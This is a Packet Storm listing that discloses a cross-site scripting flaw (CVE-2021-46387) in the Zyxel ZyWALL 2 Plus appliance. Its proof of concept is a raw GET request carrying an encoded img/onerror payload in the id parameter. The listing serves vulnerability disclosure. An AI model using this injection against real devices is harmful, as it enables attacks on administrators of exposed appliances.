Lucene search

K
packetstormMomen EldawakhlyPACKETSTORM:166189
HistoryMar 02, 2022 - 12:00 a.m.

Zyxel ZyWALL 2 Plus Cross Site Scripting

2022-03-0200:00:00
Momen Eldawakhly
packetstormsecurity.com
225

0.122 Low

EPSS

Percentile

95.4%

`# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)  
# Date: 1/3/2022  
# Exploit Author: Momen Eldawakhly (CyberGuy)  
# Vendor Homepage: https://www.zyxel.com  
# Version: ZyWALL 2 Plus  
# Tested on: Ubuntu Linux [Firefox]  
# CVE : CVE-2021-46387  
  
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1  
Host: vuln.ip:8080  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
`

0.122 Low

EPSS

Percentile

95.4%